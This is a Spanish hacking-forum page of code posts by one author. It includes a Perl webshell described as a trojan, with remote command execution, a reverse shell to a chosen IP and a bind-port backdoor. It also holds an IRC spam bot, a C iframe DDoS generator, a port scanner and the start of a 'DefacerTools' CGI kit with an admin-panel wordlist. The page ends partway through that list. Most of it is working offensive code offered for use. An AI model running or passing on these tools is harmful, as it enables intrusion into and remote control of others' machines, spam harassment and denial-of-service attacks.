elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Mensajes
Páginas: 1 ... 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 [43] 44 45 46 47 48 49 50 51 52 53 54 55
421  Programación / Scripting / [Perl] IRC Spam 0.3 en: 19 Enero 2012, 20:34 pm
Un simple script para hacer spam molesto a cada uno de los usuarios que esten en en canal , el spam lo
pueden editar con una pagina cualquiera o lo que quieran promocionar.

Código
  1. #!usr/bin/perl
  2. #IRC Spam 0.3
  3. #Coded By Doddy H
  4.  
  5. use IO::Socket;
  6.  
  7. my @msg_users = ( "Hola",         "Chau" );          #Spam to users
  8. my @msg_canal = ( "Hola a todos", "que ondaaa" );    #Spam to canal
  9. my @bots      = ( "Jebus",        "Ramona" );        #Names of the bots
  10.  
  11. &head;
  12.  
  13. unless ( @ARGV == 2 ) {
  14.  
  15.    &sintax;
  16.  
  17. }
  18. else {
  19.  
  20.    print "\n[+] Connecting\n\n";
  21.  
  22.    if (
  23.        my $socket = new IO::Socket::INET(
  24.            PeerAddr => $ARGV[0],
  25.            PeerPort => 6667,
  26.            Proto    => "tcp"
  27.        )
  28.      )
  29.    {
  30.  
  31.        my $nombre = $bots[ rand(@bots) ];
  32.  
  33.        chomp $nombre;
  34.  
  35.        print $socket "NICK $nombre\r\n";
  36.        print $socket "USER $nombre 1 1 1 1\r\n";
  37.        print $socket "JOIN $ARGV[1]\r\n";
  38.  
  39.        print "[+] Spammer Online\n\n";
  40.  
  41.        while ( my $log = <$socket> ) {
  42.  
  43.            chomp $log;
  44.  
  45.            if ( $log =~ /^PING(.*)$/i ) {
  46.                print $socket "PONG $1\r\n";
  47.            }
  48.  
  49.            if ( $log =~ m/:(.*) 353 (.*) = (.*) :(.*)/ig ) {
  50.  
  51.                while (true) {
  52.  
  53.                    my $pro = $4;
  54.  
  55.                    sleep 10;
  56.  
  57.                    print $socket "PRIVMSG $ARGV[1] "
  58.                      . $msg_canal[ rand(@msg_canal) ] . "\r\n";
  59.                    my @nicks = split " ", $pro;
  60.  
  61.                    sleep 3;
  62.  
  63.                    foreach $names (@nicks) {
  64.                        unless ( $nombre eq $names ) {
  65.                            $names =~ s/\@//;
  66.                            print $socket
  67.                              "MSG $names $msg_users[rand(@msg_users)]\r\n";
  68.                            print "[+] Spam : $names !\n";
  69.                        }
  70.                    }
  71.                }
  72.            }
  73.        }
  74.    }
  75.    else {
  76.        print "[-] Error\n";
  77.    }
  78. }
  79.  
  80. &copyright;
  81.  
  82. sub sintax {
  83.    print "\n[+] : $0 <server> <channel>\n";
  84. }
  85.  
  86. sub head {
  87.  
  88.    print qq(
  89.  
  90. @  @@@@@    @@@@      @@@   @@@@@    @    @     @  @     @  @@@@@  @@@@@
  91. @  @    @  @    @    @   @  @    @   @    @     @  @     @  @      @    @
  92. @  @    @  @         @      @    @  @ @   @@   @@  @@   @@  @      @    @
  93. @  @    @  @         @      @    @  @ @   @@   @@  @@   @@  @      @    @
  94. @  @@@@@   @          @@@   @@@@@  @   @  @ @ @ @  @ @ @ @  @@@@   @@@@@
  95. @  @    @  @             @  @      @   @  @ @ @ @  @ @ @ @  @      @    @
  96. @  @    @  @             @  @      @@@@@  @  @  @  @  @  @  @      @    @
  97. @  @    @  @    @    @   @  @     @     @ @  @  @  @  @  @  @      @    @
  98. @  @    @   @@@@      @@@   @     @     @ @     @  @     @  @@@@@  @    @
  99.  
  100.  
  101. );
  102.  
  103. }
  104.  
  105. sub copyright {
  106.    print "\n\n(C) Doddy Hackman 2012\n\n";
  107. }
  108.  
  109. # The End ?
  110.  
  111.  
422  Programación / Scripting / [Perl] Commander 0.3 en: 19 Enero 2012, 20:34 pm
Una mejora de un troyano al estilo webshell que habia hecho el verano pasado.

Código
  1. #!usr/bin/perl
  2. #
  3. #C0mmand3r (C) Doddy HAckman 2012
  4. #Version 0.3
  5. #
  6. #A simple WebShell in Perl
  7. #
  8. #
  9.  
  10. use IO::Socket;
  11. use CGI;
  12. use Cwd;
  13. use Win32;
  14.  
  15. my $port = rep();
  16.  
  17. sub rep {
  18.    unless ( $ARGV[0] ) {
  19.        return int("777");    #Your Can Edit 666
  20.    }
  21.    else {
  22.        return int( $ARGV[0] );
  23.    }
  24. }
  25.  
  26. print "\n\n#########################################\n\n";
  27. print "C0mmand3r (C) Doddy HAckman 2012\n\n\n";
  28. print "[+] Starting the webshell on port $port\n\n";
  29. print "#########################################\n\n";
  30.  
  31. my $sock = new IO::Socket::INET(
  32.    LocalHost => 'localhost',
  33.    LocalPort => $port,
  34.    Proto     => 'tcp',
  35.    Listen    => SOMAXCONN,
  36.    Reuse     => 1
  37. );
  38.  
  39. while ( $jebus = $sock->accept() ) {
  40.  
  41.    print $jebus "HTTP/1.1 200/OK\r\nContent-type:text/html\r\n\r\n";
  42.  
  43. #print $jebus "HTTP/1.1 200/OK\r\nContent-type:application/w-www-form-urlencoded\r\n\r\n";
  44.    next if $slave = fork;
  45.  
  46.    close $sock;
  47.  
  48.    while ( $response = <$jebus> ) {
  49.  
  50.        chomp($response);
  51.  
  52.        my %rta;
  53.  
  54.        if ( $response =~ /GET/ig ) {
  55.            capturar($response);
  56.        }
  57.  
  58.        sub capturar {
  59.            my $aa = shift;
  60.            chomp $aa;
  61.            if ( $aa =~ /GET \/(.*) HTTP\/1.1/ig ) {
  62.                my $todo = $1;
  63.                if ( $todo =~ /\?(.*)=(.*)&(.*)=(.*)/ig ) {
  64.                    $rta{$1} = $2;
  65.                    $rta{$3} = $4;
  66.                }
  67.                if ( $todo =~ /\?(.*)=(.*)/ig ) {
  68.                    $rta{$1} = $2;
  69.                }
  70.            }
  71.  
  72.        }
  73.  
  74.        print $jebus "
  75.  
  76. <style type=text/css>
  77.  
  78.  
  79. .main {
  80. margin : -287px 0px 0px -490px;
  81. border : White solid 1px;
  82. BORDER-COLOR: #00FF00;
  83. }
  84.  
  85. #pie {
  86. position: absolute;
  87. bottom: 0;
  88. }
  89.  
  90. body,a:link {
  91. font: normal 16px Verdana, Arial, Helvetica,
  92. sans-serif;
  93. background-color: #000000;
  94. color:#00FF00;
  95. Courier New;
  96. cursor:crosshair;
  97. font-size: small;
  98. }
  99.  
  100. input,table.outset,table.bord,table,textarea,select,fieldset {
  101. background-color:black;color:#00FF00;
  102. border: solid 1px #00FF00;
  103. border-color:#00FF00
  104. }
  105.  
  106. a:link,a:visited,a:active {
  107. color: #00FF00;
  108. font: normal 16px Verdana, Arial, Helvetica,
  109. sans-serif;
  110. text-decoration: none;
  111. }
  112.  
  113. </style>
  114.  
  115. ";
  116.  
  117.        if ( $rta{'info'} ) {
  118.  
  119.            info();
  120.  
  121.            print $jebus "<center><br><br><b>IP : </b>" . get_ip() . "<br>";
  122.            print $jebus "<center><br><br><b>Domain : </b>"
  123.              . Win32::DomainName() . "<br>";
  124.            print $jebus "<b>Chip : </b>" . Win32::GetChipName() . "<br>";
  125.            print $jebus "<b>OS : </b>" . Win32::GetOSName() . "<br>";
  126.            print $jebus "<b>Version : </b>" . Win32::GetOSVersion() . "<br>";
  127.            print $jebus "<b>User : </b>"
  128.              . Win32::LoginName()
  129.              . "<br><br></center>";
  130.            copyright();
  131.  
  132.        }
  133.  
  134.        elsif ( $rta{'console'} ) {
  135.            logouno();
  136.            print $jebus "
  137. <br><br><center>
  138. <form action='' method=GET>
  139. Command : <input type=text name=cmd value=ver><input type=submit value=Execute>
  140. </center></form><br><br>
  141. ";
  142.            copyright();
  143.        }
  144.  
  145.        elsif ( $rta{'cmd'} ) {
  146.            logouno();
  147.            $lucha = $rta{'cmd'};
  148.            print $jebus "<br><br><center><fieldset>";
  149.            $lucha =~ s/\+/ /;
  150.            print $jebus "<br>[+] Command : <b>$lucha</b><br><br>";
  151.            print $jebus qx($lucha);
  152.            print $jebus "</center></fieldset>";
  153.            copyright();
  154.        }
  155.  
  156.        elsif ( $rta{'reverse'} ) {
  157.  
  158.            logodos();
  159.  
  160.            print $jebus qq(
  161. <center>
  162. <br><br><b>ReverseShell</b><br><br>
  163. <form action='' method=GET>
  164. <b>Your IP</B> : <input type=text name=ipconnect value=localhost><br>
  165. <b>Port</b> : <input type=text name=port value=666><br>
  166. <br><input type=submit value=Connect></form><br><br>
  167. </center>
  168. );
  169.  
  170.            copyright();
  171.        }
  172.  
  173.        elsif ( $rta{'ipconnect'} ) {
  174.  
  175.            conectar( $rta{'ipconnect'}, $rta{'port'} );
  176.            tipo();
  177.  
  178.            sub conectar {
  179.                socket( REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp") );
  180.                connect( REVERSE, sockaddr_in( $_[1], inet_aton( $_[0] ) ) );
  181.                open( STDIN,  ">&REVERSE" );
  182.                open( STDOUT, ">&REVERSE" );
  183.                open( STDERR, ">&REVERSE" );
  184.            }
  185.  
  186.            sub tipo {
  187.                print "\n[*] Reverse Shell Starting...\n\n";
  188.                if ( $^O =~ /Win32/ig ) {
  189.                    infowin();
  190.                    system("cmd.exe");
  191.                }
  192.                else {
  193.                    infolinux();
  194.  
  195.                    #root();
  196.                    system("export TERM=xterm;exec sh -i");
  197.                }
  198.            }
  199.  
  200.            sub infowin {
  201.                print "[+] Domain Name : " . Win32::DomainName() . "\n";
  202.                print "[+] OS Version : " . Win32::GetOSName() . "\n";
  203.                print "[+] Username : " . Win32::LoginName() . "\n\n\n";
  204.            }
  205.  
  206.            sub infolinux {
  207.                print "[+] System information\n\n";
  208.                system("uname -a");
  209.                print "\n\n";
  210.            }
  211.        }
  212.  
  213.        elsif ( $rta{'backdoor'} ) {
  214.  
  215.            logotres();
  216.  
  217.            print $jebus qq(
  218. <center>
  219. <br><br><b>BindPort</b><br><br>
  220. <form action='' method=GET>
  221. <b>Port</b> : <input type=text name=portbind value=666><br>
  222. <br><input type=submit value=Bind></form><br><br>
  223. </center>
  224. );
  225.  
  226.            copyright();
  227.  
  228.        }
  229.  
  230.        elsif ( $rta{'portbind'} ) {
  231.  
  232.            $backdoor = IO::Socket::INET->new(
  233.                Proto     => 'tcp',
  234.                LocalPort => $rta{'portbind'},
  235.                Listen    => SOMAXC,
  236.                Reuse     => 1
  237.            );
  238.  
  239.            while ( $jesus = $backdoor->accept() ) {
  240.                $jesus->autoflush(1);
  241.                print $jesus
  242.                  "[*] Heaven_Door Online\n[*] Port : 25256\n[*] PID : "
  243.                  . $$ . "\n\n";
  244.                print $jesus "Welcome  " . $jesus->peerhost . "\n\n";
  245.                &extras;
  246.                $dir = getcwd();
  247.                print $jesus $dir . ">>";
  248.                while (<$jesus>) {
  249.                    my $yeah = qx($_);
  250.                    print $jesus "\n\n" . $yeah . "\n\n";
  251.                    print $jesus $dir . ">>";
  252.                }
  253.            }
  254.  
  255.            sub extras {
  256.  
  257.                if ( $^O =~ //ig ) {
  258.                    print $jesus "[+] Domain Name : "
  259.                      . Win32::DomainName() . "\n";
  260.                    print $jesus "[+] OS Version : "
  261.                      . Win32::GetOSName() . "\n";
  262.                    print $jesus "[+] Username : "
  263.                      . Win32::LoginName()
  264.                      . "\n\n\n";
  265.                }
  266.                else {
  267.                    $s = qx("uname -a");
  268.                    print $jesus "--==System Info==--\n\n" . $s;
  269.                }
  270.            }
  271.        }
  272.  
  273.        elsif ( $rta{'about'} ) {
  274.  
  275.            about();
  276.  
  277.            print $jebus qq(
  278. <pre><center>
  279.  
  280.  
  281.                 ¾¾¾¾¾¾¾¾¾¾¾              
  282.             ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾          
  283.           ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾          
  284.         ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾        
  285.         ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾        
  286.        ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾      
  287.       ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾      
  288.       ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾      
  289.       ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾      
  290.        ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾      
  291.        ¾¾¾¾¾¾¾  ¾¾¾¾¾¾¾¾¾¾¾    ¾¾¾¾      
  292.         ¾¾¾¾       ¾¾¾¾¾¾      ¾¾¾¾      
  293.          ¾¾¾      ¾¾¾ ¾¾¾      ¾¾¾        
  294.          ¾¾¾¾¾¾¾¾¾¾¾   ¾¾¾   ¾¾¾¾          
  295.           ¾¾¾¾¾¾¾¾¾     ¾¾¾¾¾¾¾¾¾        
  296.           ¾¾¾¾¾¾¾¾¾  ¾  ¾¾¾¾¾¾¾¾¾        
  297.           ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾        
  298.                ¾¾¾¾¾¾¾¾¾¾¾¾¾              
  299.              ¾  ¾¾¾¾¾¾¾¾¾¾  ¾            
  300.              ¾    ¾ ¾¾¾¾ ¾  ¾            
  301.              ¾ ¾¾          ¾¾            
  302.     ¾¾¾      ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾            
  303.    ¾¾¾¾¾      ¾¾¾¾¾¾¾¾¾¾¾¾¾¾      ¾¾¾    
  304.    ¾¾¾¾¾¾¾      ¾¾¾¾¾¾¾¾¾¾¾      ¾¾¾¾¾¾  
  305.    ¾¾¾¾¾¾¾¾¾¾      ¾¾¾         ¾¾¾¾¾¾¾¾¾  
  306.     ¾¾¾  ¾¾¾¾¾¾             ¾¾¾¾¾¾¾¾¾¾¾  
  307.              ¾¾¾¾¾¾     ¾¾¾¾¾¾¾          
  308.                 ¾¾¾¾¾¾¾¾¾¾¾¾              
  309.                  ¾¾¾¾¾¾¾¾¾                
  310.               ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾            
  311.           ¾¾¾¾¾¾¾         ¾¾¾¾¾¾¾        
  312.       ¾¾¾¾¾¾¾                ¾¾¾¾¾¾¾¾¾¾  
  313.  ¾¾¾¾¾¾¾¾                       ¾¾¾¾¾¾¾¾  
  314.  ¾¾¾¾¾¾                           ¾¾¾¾¾¾  
  315.   ¾¾¾¾                             ¾¾¾¾  
  316.  
  317.  
  318. </pre></center>
  319.  
  320. );
  321.  
  322.            copyright();
  323.  
  324.        }
  325.        else {
  326.            print $jebus "
  327. <title>Commander 0.3 (C) Doddy Hackman 2012</title>
  328. <br><br>
  329. <h1><center>Commander</center></h1>
  330. <br><br>
  331. <center>
  332. <table border=1>
  333. <td class=main><center><b>Tools</b></center></td><tr>
  334. <td class=main><a href=?info=true><center>Information</center></a></td><tr>
  335. <td class=main><a href=?console=true><center>Console</center></a></td><tr>
  336. <td class=main><a href=?backdoor=true><center>Backdoor</center></a></td><tr>
  337. <td class=main><a href=?reverse=true><center>ReverseShell</center></a></td><tr>
  338. <td class=main><a href=?about=true><center>About</center></a></td>
  339. </table>
  340. </center>
  341. ";
  342.            copyright();
  343.        }
  344.        $jebus->close;
  345.    }
  346. }
  347. continue {
  348.    $jebus->close;
  349. }
  350.  
  351. sub logouno {
  352.    print $jebus qq(
  353.  
  354. <pre><center>
  355.  
  356.  
  357.    @@@@@@@@                                                  @@            
  358.  @@        @@                                                @@            
  359.  @@                                                          @@            
  360.  @@              @@@@@@    @@  @@@@      @@@@      @@@@@@    @@    @@@@@@  
  361.  @@            @@      @@  @@@@    @@  @@    @@  @@      @@  @@  @@      @@
  362.  @@            @@      @@  @@      @@    @@      @@      @@  @@  @@@@@@@@@@
  363.  @@            @@      @@  @@      @@      @@    @@      @@  @@  @@        
  364.  @@        @@  @@      @@  @@      @@  @@    @@  @@      @@  @@  @@      @@
  365.    @@@@@@@@      @@@@@@    @@      @@    @@@@      @@@@@@    @@    @@@@@@  
  366.  
  367.  
  368. </pre></center>
  369. );
  370. }
  371.  
  372. sub logodos {
  373.    print $jebus qq(
  374. <pre><center>
  375.  
  376.  
  377.  @@@@@@@@@@                                                                    
  378.  @@        @@                                                                  
  379.  @@        @@                                                                  
  380.  @@        @@      @@@@@@    @@      @@    @@@@@@    @@@@    @@@@      @@@@@@  
  381.  @@@@@@@@@@      @@      @@  @@      @@  @@      @@  @@    @@    @@  @@      @@
  382.  @@        @@    @@@@@@@@@@    @@  @@    @@@@@@@@@@  @@      @@      @@@@@@@@@@
  383.  @@        @@    @@            @@  @@    @@          @@        @@    @@        
  384.  @@        @@    @@      @@      @@      @@      @@  @@    @@    @@  @@      @@
  385.  @@        @@      @@@@@@        @@        @@@@@@    @@      @@@@      @@@@@@  
  386.  
  387.  
  388. </pre></center>
  389. );
  390. }
  391.  
  392. sub logotres {
  393.  
  394.    print $jebus qq(
  395. <pre><center>
  396.  
  397.  @@@@@@@@                              @@                  @@                              
  398.  @@      @@                            @@                  @@                              
  399.  @@      @@                            @@                  @@                              
  400.  @@      @@      @@@@@@      @@@@@@    @@    @@      @@@@@@@@    @@@@@@      @@@@@@    @@@@
  401.  @@@@@@@@              @@  @@      @@  @@  @@      @@      @@  @@      @@  @@      @@  @@  
  402.  @@      @@      @@@@@@@@  @@          @@@@        @@      @@  @@      @@  @@      @@  @@  
  403.  @@      @@    @@      @@  @@          @@  @@      @@      @@  @@      @@  @@      @@  @@  
  404.  @@      @@    @@      @@  @@      @@  @@    @@    @@      @@  @@      @@  @@      @@  @@  
  405.  @@@@@@@@        @@@@@@@@    @@@@@@    @@      @@    @@@@@@@@    @@@@@@      @@@@@@    @@  
  406.  
  407.  
  408. </pre></center>
  409. );
  410. }
  411.  
  412. sub about {
  413.  
  414.    print $jebus qq(
  415. <pre><center>
  416.  
  417.  
  418.      @@        @@                                      
  419.      @@        @@                                  @@  
  420.    @@  @@      @@                                  @@  
  421.    @@  @@      @@@@@@@@      @@@@@@    @@      @@  @@@@
  422.  @@      @@    @@      @@  @@      @@  @@      @@  @@  
  423.  @@      @@    @@      @@  @@      @@  @@      @@  @@  
  424.  @@@@@@@@@@    @@      @@  @@      @@  @@      @@  @@  
  425. @@          @@  @@      @@  @@      @@  @@    @@@@  @@  
  426. @@          @@  @@@@@@@@      @@@@@@      @@@@  @@    @@
  427.  
  428.  
  429. </pre></center>
  430. );
  431.  
  432. }
  433.  
  434. sub info {
  435.  
  436.    print $jebus qq(
  437. <pre><center>
  438.  
  439.  
  440.  @@    @@        @@    @@@@@@@@@@    @@@@@@@@  
  441.  @@    @@@@      @@    @@          @@        @@
  442.  @@    @@@@      @@    @@          @@        @@
  443.  @@    @@  @@    @@    @@          @@        @@
  444.  @@    @@  @@    @@    @@@@@@@@    @@        @@
  445.  @@    @@    @@  @@    @@          @@        @@
  446.  @@    @@      @@@@    @@          @@        @@
  447.  @@    @@      @@@@    @@          @@        @@
  448.  @@    @@        @@    @@            @@@@@@@@  
  449.  
  450.  
  451. </pre></center>
  452. );
  453.  
  454. }
  455.  
  456. sub get_ip {
  457.    my $get = gethostbyname("");
  458.    return inet_ntoa($get);
  459. }
  460.  
  461. sub copyright {
  462.    print $jebus
  463.      "<br><br><br><br><center><h1>Coded By Doddy H</h2></center><br><br>";
  464.    exit(1);
  465. }
  466.  
  467. # The End ?
  468.  
  469.  
423  Programación / Programación C/C++ / [C] ScanPort en: 8 Enero 2012, 18:42 pm
Un simple programa para scannear puertos, solo funciona bajo linux.


Código
  1. /**
  2. * ScanPort 0.1
  3. * Coded by Doddy H
  4. **/
  5.  
  6. #include<stdio.h>
  7. #include<sys/socket.h>
  8. #include<sys/types.h>
  9. #include<stdlib.h>
  10. #include<netdb.h>
  11.  
  12. void head() {
  13.  printf("\n-- == ScanPort 0.1 == --\n");
  14. }
  15.  
  16. void end() {
  17.  printf("\n\nWritten By Doddy H\n\n");
  18. }
  19.  
  20. int main(int argc,char **argv) {
  21.  
  22.  char *ip;
  23.  int port,control,partedos,portstart,portend;
  24.  struct sockaddr_in parteuno;
  25.  
  26.  head();
  27.  if(argc != 4) {
  28.    printf("\n[+] sintax : port <ip> <portstart> <portend>");
  29.  } else {
  30.    ip = argv[1];
  31.    portstart = atoi(argv[2]);
  32.    portend = atoi(argv[3]);
  33.    printf("\n[+] Scanning %s\n",ip);
  34.    printf("\n[+] Parameters : %d-%d\n",portstart,portend);
  35.    for(port=portstart;port<portend;port++) {
  36.      parteuno.sin_family=AF_INET;
  37.      parteuno.sin_port=htons(port);
  38.      parteuno.sin_addr.s_addr=inet_addr(ip);
  39.      partedos=socket(AF_INET,SOCK_STREAM,0);
  40.      control=connect(partedos,(struct sockaddr_in *)&parteuno,sizeof(parteuno));
  41.      if(control>=0) {
  42.        printf("\n[+] Port Found : %d",port);
  43.      }  
  44.    }
  45.  }
  46.  end();
  47.  return 0;
  48. }
  49.  
  50. /** The End ? **/
  51.  
  52.  
424  Programación / Programación C/C++ / [C] ResolveIP en: 8 Enero 2012, 18:41 pm
Un simple programa para saber la IP de cualquier host.

Código
  1. /**
  2. * ResolveIP 0.1
  3. * Written By Doddy H
  4. * Thanks to CrashCool
  5. */
  6.  
  7. #include <winsock.h>
  8. #include <stdio.h>
  9.  
  10. void head() {
  11.  printf("\n -- == ResolveIP 0.1 == --\n\n");    
  12. }
  13.  
  14. void end() {
  15.  printf("\n\n -- == Written By Doddy H == --\n");
  16. }
  17.  
  18. int main(int argc, char *argv[]) {
  19.  char *dom,*host,*ip;
  20.  struct hostent *parteuno;
  21.  WSADATA partedos;
  22.  
  23.  head();
  24.  
  25.  if(argc != 2) {
  26.    printf("\n[+] Sintax : resolve <host>\n");
  27.  } else {
  28.    dom = argv[1];
  29.    WSAStartup(MAKEWORD(1,1),&partedos);
  30.    parteuno = gethostbyname(dom);
  31.    if(parteuno==NULL) {
  32.      printf("\n[-] Error\n");
  33.      end();
  34.      exit(1);
  35.    }
  36.    host = parteuno->h_name;
  37.    ip = inet_ntoa(*((struct in_addr *)parteuno->h_addr));
  38.    printf("\n[+] HOST : %s",host);
  39.    printf("\n[+] IP : %s\n",ip);
  40.  }
  41.  end();
  42.  return 0;
  43. }
  44.  
  45. /* The End */
  46.  
425  Programación / Programación C/C++ / [C] Manager en: 8 Enero 2012, 18:40 pm
Un simple programa para manejar los procesos de Windows.

Código
  1.  
  2. /**
  3. Simple process manager
  4. Coded By Doddy H
  5. **/
  6.  
  7. #include <windows.h>
  8. #include <Tlhelp32.h>
  9. #include <stdio.h>
  10.  
  11. int main() {
  12.  HANDLE parteuno,partedos;
  13.  PROCESSENTRY32 control;
  14.  int re,pid;
  15.  
  16.  printf("\n\n-- == Manager == --\n\n");
  17.  printf("1 - Show Process\n");
  18.  printf("2 - Close Process\n");
  19.  printf("3 - Exit\n\n");
  20.  
  21.  while(1) {
  22.    printf("[Option] : ");
  23.    scanf("%d",&re);
  24.  
  25.    if (re==1) {
  26.      printf("\n[+] Getting process..\n\n");        
  27.      parteuno = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
  28.      Process32First(parteuno,&control);
  29.      while(Process32Next(parteuno,&control)){
  30.        printf("[+] Process : %s \n",control.szExeFile);
  31.        printf("[+] PID : %i\n\n",control.th32ProcessID);
  32.      }
  33.      CloseHandle(parteuno);
  34.    }
  35.    else if (re==2) {
  36.      printf("\n[PID] : ");
  37.      scanf("%d",&pid);
  38.      partedos =OpenProcess(PROCESS_TERMINATE,0,pid);
  39.      if (TerminateProcess(partedos,0)) {
  40.        printf("\n[+] Process Closed\n\n");
  41.      } else {
  42.        printf("\n[-] Error\n\n");
  43.        exit(1);
  44.      }
  45.      CloseHandle(partedos);
  46.    }
  47.    else if (re==3) {
  48.      setbuf (stdin,NULL);  
  49.      printf("\n\nWritten By Doddy H\n\n");
  50.      getchar();
  51.      exit(1);
  52.    }
  53.  }
  54.  return 0;
  55. }
  56.  
  57. /** The End ? **/
  58.  
426  Programación / Programación C/C++ / [C] Iframe DDOS en: 8 Enero 2012, 18:38 pm
Un simple POC para iframe DDOS

Código
  1.  
  2. /**
  3. * Simple POC for IFRAME DDOS
  4. * Coded By Doddy H
  5. */
  6.  
  7. #include <stdio.h>
  8.  
  9. void head() {
  10.  printf("\n -- == IFRAME DDOS 0.1 == --\n\n");    
  11. }
  12.  
  13. void end() {
  14.  printf("\n\n -- == Coded By Doddy H == --\n");
  15. }
  16.  
  17. int main ( int argc, char **argv ) {
  18.  char *target;
  19.  int i,count;
  20.  FILE *archivo;
  21.  
  22.  head();
  23.  if(argc != 3) {
  24.    printf("\n[+] Sintax : ddos <target> <count>\n");
  25.  } else {
  26.    target = argv[1];
  27.    count = atoi(argv[2]);
  28.    printf("\n[+] Starting the party");
  29.    archivo = fopen ("poc.html","a+");
  30.    for(i=0;i<=count;i++) {                          
  31.      fprintf(archivo,"%s","<iframe src='");
  32.      fprintf(archivo,"%s",target);
  33.      fprintf(archivo,"%s","' width='3' height='3'></iframe><br>\n");
  34.    }
  35.    fclose(archivo);    
  36.    printf("\n[+] Finished\n");
  37.  }    
  38.  end();
  39.  return 0;
  40. }
  41.  
  42. /** The End ? */
  43.  
427  Programación / Programación C/C++ / [C] Hex Converter en: 8 Enero 2012, 18:37 pm
Un simple programa para convertir texto en hex


Código
  1. /**
  2. * Hex Converter
  3. * Coded By Doddy H
  4. * Based in hex encoder by Ka0x
  5. */
  6.  
  7. #include <stdio.h>
  8. #include <string.h>
  9.  
  10. void head() {
  11.  printf("\n -- == Hex Converter == --\n\n");    
  12. }
  13.  
  14. void end() {
  15.  printf("\n\n\n -- == Coded By Doddy H == --\n");
  16. }
  17.  
  18. int main ( int argc, char **argv ) {
  19.  char *text;
  20.  int i,total;
  21.  
  22.  head();
  23.  if(argc != 2) {
  24.    printf("\n[+] Sintax : hex <text>");
  25.  } else {
  26.    text = argv[1];
  27.    total = strlen(text);
  28.    printf("\n[Text] : %s\n",text);
  29.    printf("[Encode] : 0x");
  30.    for(i=0;i<total;i++){
  31.      printf("%x",text[i]);
  32.    }
  33.  }    
  34.  end();
  35.  return 0;
  36. }
  37.  
  38. /** The End ? */
  39.  
428  Programación / Scripting / [Perl] DefacerTools 0.5 (regalo de navidad) en: 11 Diciembre 2011, 01:03 am
Hola aca les traigo un regalo de navidad que hice en 3 horas , es un programa en CGI para usar en webs que
soporten el mismo , yo hice todas las pruebas con xampp y al parecer todo funciona bien.

Las funciones del programa son :

  • HexConverter
  • PanelFinder
  • PathsFinder
  • SQLi Scanner
  • FuzzDNS
  • FinderPass
  • PortScanner

El codigo del programa (formateado con perltidy) es

defacertools.cgi

Código
  1. #!"\xampp\perl\bin\perl.exe"
  2. #
  3. #DefacerTools 0.5
  4. #
  5. #(C) Doddy Hackman 2012
  6. #
  7. #
  8.  
  9. use CGI;
  10. use LWP::UserAgent;
  11. use URI::Split qw(uri_split);
  12. use HTML::LinkExtor;
  13. use IO::Socket;
  14.  
  15. @panels = (
  16.    'admin/admin.asp',               'admin/login.asp',
  17.    'admin/index.asp',               'admin/admin.aspx',
  18.    'admin/login.aspx',              'admin/index.aspx',
  19.    'admin/webmaster.asp',           'admin/webmaster.aspx',
  20.    'asp/admin/index.asp',           'asp/admin/index.aspx',
  21.    'asp/admin/admin.asp',           'asp/admin/admin.aspx',
  22.    'asp/admin/webmaster.asp',       'asp/admin/webmaster.aspx',
  23.    'admin/',                        'login.asp',
  24.    'login.aspx',                    'admin.asp',
  25.    'admin.aspx',                    'webmaster.aspx',
  26.    'webmaster.asp',                 'login/index.asp',
  27.    'login/index.aspx',              'login/login.asp',
  28.    'login/login.aspx',              'login/admin.asp',
  29.    'login/admin.aspx',              'administracion/index.asp',
  30.    'administracion/index.aspx',     'administracion/login.asp',
  31.    'administracion/login.aspx',     'administracion/webmaster.asp',
  32.    'administracion/webmaster.aspx', 'administracion/admin.asp',
  33.    'administracion/admin.aspx',     'php/admin/',
  34.    'admin/admin.php',               'admin/index.php',
  35.    'admin/login.php',               'admin/system.php',
  36.    'admin/ingresar.php',            'admin/administrador.php',
  37.    'admin/default.php',             'administracion/',
  38.    'administracion/index.php',      'administracion/login.php',
  39.    'administracion/ingresar.php',   'administracion/admin.php',
  40.    'administration/',               'administration/index.php',
  41.    'administration/login.php',      'administrator/index.php',
  42.    'administrator/login.php',       'administrator/system.php',
  43.    'system/',                       'system/login.php',
  44.    'admin.php',                     'login.php',
  45.    'administrador.php',             'administration.php',
  46.    'administrator.php',             'admin1.html',
  47.    'admin1.php',                    'admin2.php',
  48.    'admin2.html',                   'yonetim.php',
  49.    'yonetim.html',                  'yonetici.php',
  50.    'yonetici.html',                 'adm/',
  51.    'admin/account.php',             'admin/account.html',
  52.    'admin/index.html',              'admin/login.html',
  53.    'admin/home.php',                'admin/controlpanel.html',
  54.    'admin/controlpanel.php',        'admin.html',
  55.    'admin/cp.php',                  'admin/cp.html',
  56.    'cp.php',                        'cp.html',
  57.    'administrator/',                'administrator/index.html',
  58.    'administrator/login.html',      'administrator/account.html',
  59.    'administrator/account.php',     'administrator.html',
  60.    'login.html',                    'modelsearch/login.php',
  61.    'moderator.php',                 'moderator.html',
  62.    'moderator/login.php',           'moderator/login.html',
  63.    'moderator/admin.php',           'moderator/admin.html',
  64.    'moderator/',                    'account.php',
  65.    'account.html',                  'controlpanel/',
  66.    'controlpanel.php',              'controlpanel.html',
  67.    'admincontrol.php',              'admincontrol.html',
  68.    'adminpanel.php',                'adminpanel.html',
  69.    'admin1.asp',                    'admin2.asp',
